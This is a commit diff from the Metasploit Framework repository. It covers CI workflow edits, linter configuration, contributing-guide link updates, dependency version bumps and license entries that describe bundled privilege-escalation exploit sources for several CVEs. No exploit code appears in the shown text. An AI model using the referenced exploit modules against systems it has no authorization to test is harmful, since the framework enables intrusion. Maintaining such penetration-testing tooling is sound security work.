automatic module_metadata_base.json update

Land #17771 , add monitorr file upload rce
use target_uri.path in requests
2023-03-22 13:15:21 -05:00 · 2023-03-22 13:00:38 -05:00 · 2023-03-22 12:50:11 -05:00 · 2023-03-22 10:58:56 -05:00 · 2023-03-22 10:34:00 -05:00 · 2023-03-22 15:20:12 +00:00
1256 changed files with 77245 additions and 30335 deletions
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
+          - '2.7'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -48,12 +48,11 @@ jobs:
      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          working-directory: docs

      - name: build
        working-directory: docs
        run: |
-          bundle exec ruby build.rb
          bundle exec ruby build.rb --production
@@ -59,7 +59,7 @@ jobs:
                  comment: `
                    Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

-                    - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+                    - [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
                    - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
                    - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
                  `
@@ -35,7 +35,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
+          - '2.7'

    name: Lint msftidy
    steps:
@@ -51,7 +51,7 @@ jobs:

      - uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
        env:
          BUNDLE_WITHOUT: "coverage development pcap"
@@ -67,6 +67,7 @@ jobs:
          - '2.7'
          - '3.0'
          - '3.1'
+          - '3.2'
        os:
          - ubuntu-20.04
          - ubuntu-latest
@@ -175,12 +175,13 @@ Lint/DeprecatedGemVersion:
  Exclude:
    - 'metasploit-framework.gemspec'

-Metrics/ClassLength:
+Metrics/ModuleLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
-  Enabled: true
-  Exclude:
-    - 'modules/**/*'
-    - 'test/modules/**/*'
+  Enabled: false
+
+Metrics/ClassLength:
+  Description: 'Most Metasploit classes are quite large. This is ok.'
+  Enabled: false

 Style/ClassAndModuleChildren:
  Enabled: false
@@ -217,6 +218,10 @@ Style/FrozenStringLiteralComment:
  Enabled: false
  Description: 'We cannot support this yet without a lot of things breaking'

+Style/MutableConstant:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
 Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false
@@ -253,6 +258,18 @@ Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false

+Style/EvenOdd:
+  Description: 'This adds no efficiency nor space saving'
+  Enabled: false
+
+Style/FloatDivision:
+  Description: 'Not a safe rule to run on Metasploit without manual verification as the right hand side may be a string'
+  Enabled: false
+
+Style/FormatString:
+  Description: 'Not a safe rule to run on Metasploit without manual verification that the format is not redefined/shadowed'
+  Enabled: false
+
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
@@ -350,6 +367,191 @@ Naming/MethodParameterName:
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2

+Naming/PredicateName:
+  Enabled: true
+  # Current methods that break the rule, so that we don't add additional methods that break the convention
+  AllowedMethods:
+    - has_additional_info?
+    - has_advanced_options?
+    - has_auth
+    - has_auto_target?
+    - has_bad_activex?
+    - has_badchars?
+    - has_chars?
+    - has_check?
+    - has_command?
+    - has_content_type_extension?
+    - has_datastore_cred?
+    - has_evasion_options?
+    - has_fatal_errors?
+    - has_fields
+    - has_files?
+    - has_flag?
+    - has_function_name?
+    - has_gcc?
+    - has_h2_headings
+    - has_input_name?
+    - has_j_security_check?
+    - has_key?
+    - has_match?
+    - has_module
+    - has_object_ref
+    - has_objects_list
+    - has_options?
+    - has_page?
+    - has_passphrase?
+    - has_pid?
+    - has_pkt_line_data?
+    - has_prereqs?
+    - has_privacy_waiver?
+    - has_privates?
+    - has_protected_mode_prompt?
+    - has_proxy?
+    - has_read_data?
+    - has_ref?
+    - has_required_args
+    - has_required_module_options?
+    - has_requirements
+    - has_rop?
+    - has_s_flag?
+    - has_service_cred?
+    - has_subscriber?
+    - has_subtree?
+    - has_text
+    - has_tlv?
+    - has_u_flag?
+    - has_users?
+    - has_vuln?
+    - has_waiver?
+    - have_auth_error?
+    - have_powershell?
+    - is_accessible?
+    - is_admin?
+    - is_alive?
+    - is_alpha_web_server?
+    - is_android?
+    - is_app_binom3?
+    - is_app_carlogavazzi?
+    - is_app_cnpilot?
+    - is_app_epaduo?
+    - is_app_epmp1000?
+    - is_app_infovista?
+    - is_app_ironport?
+    - is_app_metweblog?
+    - is_app_oilom?
+    - is_app_openmind?
+    - is_app_popad?
+    - is_app_radware?
+    - is_app_rfreader?
+    - is_app_sentry?
+    - is_app_sevone?
+    - is_app_splunk?
+    - is_app_ssl_vpn?
+    - is_array_type?
+    - is_auth_required?
+    - is_author_blacklisted?
+    - is_badchar
+    - is_base64?
+    - is_bind?
+    - is_cached_size_accurate?
+    - is_cgi_enabled?
+    - is_cgi_exploitable?
+    - is_check_interesting?
+    - is_child_of?
+    - is_clr_enabled
+    - is_connect?
+    - is_dlink?
+    - is_dn?
+    - is_dynamic?
+    - is_error_code
+    - is_exception?
+    - is_exploit_module?
+    - is_exploitable?
+    - is_fqdn?
+    - is_glob?
+    - is_groupwise?
+    - is_guest_mode_enabled?
+    - is_hash_from_empty_pwd?
+    - is_high_integrity?
+    - is_hostname?
+    - is_ie?
+    - is_imc?
+    - is_imc_som?
+    - is_in_admin_group?
+    - is_interface?
+    - is_ip_targeted?
+    - is_key_wanted?
+    - is_leaf?
+    - is_local?
+    - is_logged_in?
+    - is_loggedin
+    - is_loopback_address?
+    - is_mac?
+    - is_match
+    - is_md5_format?
+    - is_module_arch?
+    - is_module_platform?
+    - is_module_wanted?
+    - is_multi_platform_exploit?
+    - is_not_null?
+    - is_null_pointer
+    - is_null_pointer?
+    - is_num?
+    - is_num_type?
+    - is_numeric
+    - is_online?
+    - is_parseable
+    - is_pass_ntlm_hash?
+    - is_passwd_method?
+    - is_password_required?
+    - is_payload_compatible?
+    - is_payload_platform_compatible?
+    - is_pointer_type?
+    - is_pri_key?
+    - is_proficy?
+    - is_rdp_up
+    - is_remote_exploit?
+    - is_resource_taken?
+    - is_rf?
+    - is_rmi?
+    - is_root?
+    - is_routable?
+    - is_running?
+    - is_scan_complete
+    - is_secure_admin_disabled?
+    - is_session_type?
+    - is_signature_correct?
+    - is_single_object?
+    - is_struct_type?
+    - is_supermicro?
+    - is_superuser?
+    - is_sws?
+    - is_system?
+    - is_system_user?
+    - is_target?
+    - is_target_suitable?
+    - is_trial_enabled?
+    - is_trustworthy
+    - is_uac_enabled?
+    - is_url_alive
+    - is_usable?
+    - is_uuid?
+    - is_valid?
+    - is_valid_bus?
+    - is_valid_snmp_value
+    - is_value_wanted?
+    - is_version_compat?
+    - is_version_tested?
+    - is_vmware?
+    - is_vul
+    - is_vulnerable?
+    - is_warbird?
+    - is_windows?
+    - is_writable
+    - is_writable?
+    - is_x86?
+    - is_zigbee_hwbridge_session?
+
 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
 Style/RedundantPercentQ:
@@ -1,6 +1,6 @@
 # Contributing to Metasploit
 Thank you for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved.
+world -- a better place!  Before you get started, please review our [Code of Conduct](./CODE_OF_CONDUCT.md). This helps us ensure our community is positive and supportive for everyone involved.

 ## Code Free Contributions
 Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
@@ -15,9 +15,9 @@ Before we get into the details of contributing code, you should know there are m


 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.

-Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.

 Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
 will be closed. We need to ensure the code we're adding to master is written to a high standard.
@@ -83,7 +83,7 @@ If you need some more guidance, talk to the main body of open source contributor
 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!

-[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
+[Code of Conduct]:https://docs.metasploit.com/docs/code-of-conduct.html
 [Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
 [Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
 [help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
@@ -101,7 +101,7 @@ curve, so keep it up!
 [PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
-[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
+[module documentation]:https://docs.metasploit.com/docs/using-metasploit/basics/module-documentation.html
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://www.betterspecs.org/
@@ -15,8 +15,7 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  # lock to version with 2.6 support until project updates
-  gem 'pry-byebug', '~> 3.9.0'
+  gem 'pry-byebug'
  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
  # Replaces the old lib/debug.rb and provides more features.
  gem 'debug', '>= 1.0.0'
@@ -1,16 +1,17 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.34)
-      actionpack (~> 6.0)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
+    metasploit-framework (6.3.9)
+      actionpack (~> 7.0)
+      activerecord (~> 7.0)
+      activesupport (~> 7.0)
      aws-sdk-ec2
      aws-sdk-iam
      aws-sdk-s3
      bcrypt
      bcrypt_pbkdf
      bson
+      chunky_png
      dnsruby
      ed25519
      em-http-request
@@ -29,7 +30,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.105)
+      metasploit-payloads (= 2.0.122)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
@@ -51,6 +52,7 @@ PATH
      pg
      puma
      railties
+      rasn1
      rb-readline
      recog
      redcarpet
@@ -96,30 +98,29 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.7)
-      actionview (= 6.1.7)
-      activesupport (= 6.1.7)
-      rack (~> 2.0, >= 2.0.9)
+    actionpack (7.0.4.2)
+      actionview (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
+      rack (~> 2.0, >= 2.2.0)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.7)
-      activesupport (= 6.1.7)
+    actionview (7.0.4.2)
+      activesupport (= 7.0.4.2)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.7)
-      activesupport (= 6.1.7)
-    activerecord (6.1.7)
-      activemodel (= 6.1.7)
-      activesupport (= 6.1.7)
-    activesupport (6.1.7)
+    activemodel (7.0.4.2)
+      activesupport (= 7.0.4.2)
+    activerecord (7.0.4.2)
+      activemodel (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
+    activesupport (7.0.4.2)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-      zeitwerk (~> 2.3)
    addressable (2.8.1)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
@@ -127,22 +128,22 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.671.0)
-    aws-sdk-core (3.168.3)
+    aws-partitions (1.722.0)
+    aws-sdk-core (3.170.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.354.0)
+    aws-sdk-ec2 (1.368.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.73.0)
+    aws-sdk-iam (1.75.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.60.0)
+    aws-sdk-kms (1.63.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.117.2)
+    aws-sdk-s3 (1.119.1)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
@@ -150,16 +151,17 @@ GEM
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.14)
+    bindata (2.4.15)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
+    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.2.2)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
-    debug (1.7.0)
+    debug (1.7.1)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
    diff-lcs (1.5.0)
@@ -177,20 +179,20 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.11.0)
+    erubi (1.12.0)
    eventmachine (1.2.7)
    factory_bot (6.2.1)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (3.0.0)
+    faker (3.1.1)
      i18n (>= 1.8.11, < 2)
-    faraday (2.7.1)
+    faraday (2.7.4)
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.0.0)
+    faraday-retry (2.1.0)
      faraday (~> 2.0)
    faye-websocket (0.11.1)
      eventmachine (>= 0.12.0)
@@ -214,8 +216,8 @@ GEM
    httpclient (2.8.3)
    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
-    io-console (0.5.11)
-    irb (1.6.1)
+    io-console (0.6.0)
+    irb (1.6.3)
      reline (>= 0.3.0)
    jmespath (1.6.2)
    jsobfu (0.4.2)
@@ -225,16 +227,17 @@ GEM
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.19.0)
+    loofah (2.19.1)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (4.0.5)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-credential (6.0.1)
+    metasploit-concern (5.0.1)
+      activemodel (~> 7.0)
+      activesupport (~> 7.0)
+      railties (~> 7.0)
+      zeitwerk
+    metasploit-credential (6.0.2)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -244,33 +247,33 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (4.0.6)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-payloads (2.0.105)
-    metasploit_data_models (5.0.6)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
+    metasploit-model (5.0.1)
+      activemodel (~> 7.0)
+      activesupport (~> 7.0)
+      railties (~> 7.0)
+    metasploit-payloads (2.0.122)
+    metasploit_data_models (6.0.2)
+      activerecord (~> 7.0)
+      activesupport (~> 7.0)
      arel-helpers
      metasploit-concern
      metasploit-model (>= 3.1)
      pg
-      railties (~> 6.0)
+      railties (~> 7.0)
      recog
      webrick
    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
-    mini_portile2 (2.8.0)
-    minitest (5.16.3)
-    mqtt (0.5.0)
-    msgpack (1.6.0)
+    mini_portile2 (2.8.1)
+    minitest (5.18.0)
+    mqtt (0.6.0)
+    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
    net-ldap (0.17.1)
-    net-protocol (0.2.0)
+    net-protocol (0.2.1)
      timeout
    net-smtp (0.3.3)
      net-protocol
@@ -278,7 +281,7 @@ GEM
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.10)
+    nokogiri (1.14.2)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -291,7 +294,7 @@ GEM
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.1.3.0)
+    parser (3.2.1.1)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
@@ -301,41 +304,44 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.5)
-    pry (0.13.1)
+    pg (1.4.6)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.9.0)
+    pry-byebug (3.10.1)
      byebug (~> 11.0)
-      pry (~> 0.13.0)
-    public_suffix (5.0.0)
-    puma (6.0.0)
+      pry (>= 0.13, < 0.15)
+    public_suffix (5.0.1)
+    puma (6.1.1)
      nio4r (~> 2.0)
-    racc (1.6.1)
-    rack (2.2.4)
-    rack-protection (3.0.4)
+    racc (1.6.2)
+    rack (2.2.6.3)
+    rack-protection (3.0.5)
      rack
    rack-test (2.0.2)
      rack (>= 1.3)
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.3)
-      loofah (~> 2.3)
-    railties (6.1.7)
-      actionpack (= 6.1.7)
-      activesupport (= 6.1.7)
+    rails-html-sanitizer (1.5.0)
+      loofah (~> 2.19, >= 2.19.1)
+    railties (7.0.4.2)
+      actionpack (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
+      zeitwerk (~> 2.5)
    rainbow (3.1.1)
    rake (13.0.6)
+    rasn1 (0.12.1)
+      strptime (~> 0.2.5)
    rb-readline (0.5.5)
    recog (3.0.3)
      nokogiri
-    redcarpet (3.5.1)
-    regexp_parser (2.6.1)
-    reline (0.3.1)
+    redcarpet (3.6.0)
+    regexp_parser (2.7.0)
+    reline (0.3.2)
      io-console (~> 0.5)
    rex-arch (0.1.14)
      rex-text
@@ -345,12 +351,12 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.28)
+    rex-core (0.1.30)
    rex-encoder (0.1.6)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.36)
+    rex-exploitation (0.1.38)
      jsobfu
      metasm
      rex-arch
@@ -368,21 +374,21 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.9)
+    rex-random_identifier (0.1.10)
      rex-text
    rex-registry (0.1.4)
    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.43)
+    rex-socket (0.1.47)
      rex-core
-    rex-sslscan (0.1.8)
+    rex-sslscan (0.1.9)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.47)
+    rex-text (0.2.50)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -391,12 +397,12 @@ GEM
      rspec-core (~> 3.12.0)
      rspec-expectations (~> 3.12.0)
      rspec-mocks (~> 3.12.0)
-    rspec-core (3.12.0)
+    rspec-core (3.12.1)
      rspec-support (~> 3.12.0)
-    rspec-expectations (3.12.0)
+    rspec-expectations (3.12.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.0)
+    rspec-mocks (3.12.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
    rspec-rails (6.0.1)
@@ -410,24 +416,24 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.12.0)
-    rubocop (1.39.0)
+    rubocop (1.48.0)
      json (~> 2.3)
      parallel (~> 1.10)
-      parser (>= 3.1.2.1)
+      parser (>= 3.2.0.0)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.23.0, < 2.0)
+      rubocop-ast (>= 1.26.0, < 2.0)
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.24.0)
-      parser (>= 3.1.1.0)
+      unicode-display_width (>= 2.4.0, < 3.0)
+    rubocop-ast (1.27.0)
+      parser (>= 3.2.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
-    ruby-progressbar (1.11.0)
+    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.1)
+    ruby_smb (3.2.5)
      bindata
      openssl-ccm
      openssl-cmac
@@ -444,32 +450,33 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.4)
+    sinatra (3.0.5)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.4)
+      rack-protection (= 3.0.5)
      tilt (~> 2.0)
-    sqlite3 (1.5.4)
+    sqlite3 (1.6.1)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
+    strptime (0.2.5)
    swagger-blocks (3.0.0)
    thin (1.8.1)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.1)
-    tilt (2.0.11)
+    tilt (2.1.0)
    timecop (0.9.6)
-    timeout (0.3.1)
+    timeout (0.3.2)
    ttfunk (1.7.0)
-    tzinfo (2.0.5)
+    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2022.7)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.3.0)
+    unicode-display_width (2.4.2)
    unix-crypt (1.3.0)
    warden (1.2.9)
      rack (>= 2.0.9)
@@ -478,7 +485,7 @@ GEM
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
-    windows_error (0.1.4)
+    windows_error (0.1.5)
    winrm (2.3.6)
      builder (>= 2.1.2)
      erubi (~> 1.8)
@@ -495,7 +502,7 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.6.6)
+    zeitwerk (2.6.7)

 PLATFORMS
  ruby
@@ -507,7 +514,7 @@ DEPENDENCIES
  memory_profiler
  metasploit-framework!
  octokit
-  pry-byebug (~> 3.9.0)
+  pry-byebug
  rake
  redcarpet
  rspec-rails
@@ -57,6 +57,20 @@ Copyright: 2018
 License: GNU GPL 3
 Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module

+Files: external/source/exploits/CVE-2022-1043/cve-2022-1043.c
+Copyright: 2022 Open Source Security, Inc.
+License: GNU GPL 2.0
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-1043, a local privilege escalation vulnerability in
+         Linux kernels 5.12-rc3 - 5.14-rc7.
+
+Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c
+Copyright: 2022 Open Source Security, Inc.
+License: GNU GPL 2.0
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-22942, a local privilege escalation vulnerability in
+         Linux kernels 4.14-rc1 - 5.17-rc1.
+
 Files: exteneral/source/exploits/CVE-2022-26904/*
 Copyright: 2022 Abdelhamid Naceri
 License: MIT
@@ -121,6 +135,13 @@ Purpose: The built result is used in:
           payloads/stages/windows/vncinject.rb
           payloads/stages/windows/x64/vncinject.rb

+Files: external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c
+Copyright: 1999-2007 Apple Inc.
+License: Apple
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-46689, a local privilege escalation vulnerability in
+         MacOSX versions (macOS dirty cow)
+
 Files: lib/anemone.rb
       lib/anemone/*
 Copyright: 2009 Vertive, Inc.
@@ -131,7 +152,7 @@ Copyright: 2017 Yukihiro Matsumoto
 License: Ruby

 Files: lib/msf/core/modules/external/python/async_timeout/*
-Copyright: 2016-2017 Andrew Svetlov
+Copyright: 2016-2023 Andrew Svetlov
 License: Apache 2.0

 Files: lib/msf/core/web_services/public/*
@@ -206,7 +227,7 @@ Purpose: This module contains the source code for FUSE, which this module
 Files: modules/exploits/linux/local/ntfs3g_priv_esc.rb
 Copyright: 2017
 License: GPLv2
-Purpose: The Ruby file contains the text of several modules from exploit-db 
+Purpose: The Ruby file contains the text of several modules from exploit-db
         which it compiles and uploads to the target to elevate privileges.

 Files: modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
@@ -218,7 +239,7 @@ Purpose: This module targets a vulnerability in Metasploit Framework versions
 Files: modules/exploits/windows/smb/ms04_007_killbill.rb
 Copyright: 2004, Solar Eclipse
 License: GPL
-Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000 
+Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000
         SP2-SP4 and Windows XP SP0-SP1. It contains code ported from a GPLv2
         module.

@@ -234,7 +255,7 @@ Purpose: This module allows us to create an x64 Windows messagebox payload.
 Files: modules/post/linux/dos/xen_420_dos.rb
 Copyright: 2016
 License: GPL
-Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a 
+Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a
         paravirtualized VM. It contains a short code section licensed through
         GPL.

@@ -998,3 +1019,372 @@ License: Zlib
 2. Altered source versions must be plainly marked as such, and must not be
    misrepresented as being the original software.
 3. This notice may not be removed or altered from any source distribution.
+
+License: Apple
+APPLE PUBLIC SOURCE LICENSE
+Version 2.0 - August 6, 2003
+
+Please read this License carefully before downloading this software.
+By downloading or using this software, you are agreeing to be bound by
+the terms of this License. If you do not or cannot agree to the terms
+of this License, please do not download or use the software.
+
+1. General; Definitions. This License applies to any program or other
+work which Apple Computer, Inc. ("Apple") makes publicly available and
+which contains a notice placed by Apple identifying such program or
+work as "Original Code" and stating that it is subject to the terms of
+this Apple Public Source License version 2.0 ("License"). As used in
+this License:
+
+1.1 "Applicable Patent Rights" mean: (a) in the case where Apple is
+the grantor of rights, (i) claims of patents that are now or hereafter
+acquired, owned by or assigned to Apple and (ii) that cover subject
+matter contained in the Original Code, but only to the extent
+necessary to use, reproduce and/or distribute the Original Code
+without infringement; and (b) in the case where You are the grantor of
+rights, (i) claims of patents that are now or hereafter acquired,
+owned by or assigned to You and (ii) that cover subject matter in Your
+Modifications, taken alone or in combination with Original Code.
+
+1.2 "Contributor" means any person or entity that creates or
+contributes to the creation of Modifications.
+
+1.3 "Covered Code" means the Original Code, Modifications, the
+combination of Original Code and any Modifications, and/or any
+respective portions thereof.
+
+1.4 "Externally Deploy" means: (a) to sublicense, distribute or
+otherwise make Covered Code available, directly or indirectly, to
+anyone other than You; and/or (b) to use Covered Code, alone or as
+part of a Larger Work, in any way to provide a service, including but
+not limited to delivery of content, through electronic communication
+with a client other than You.
+
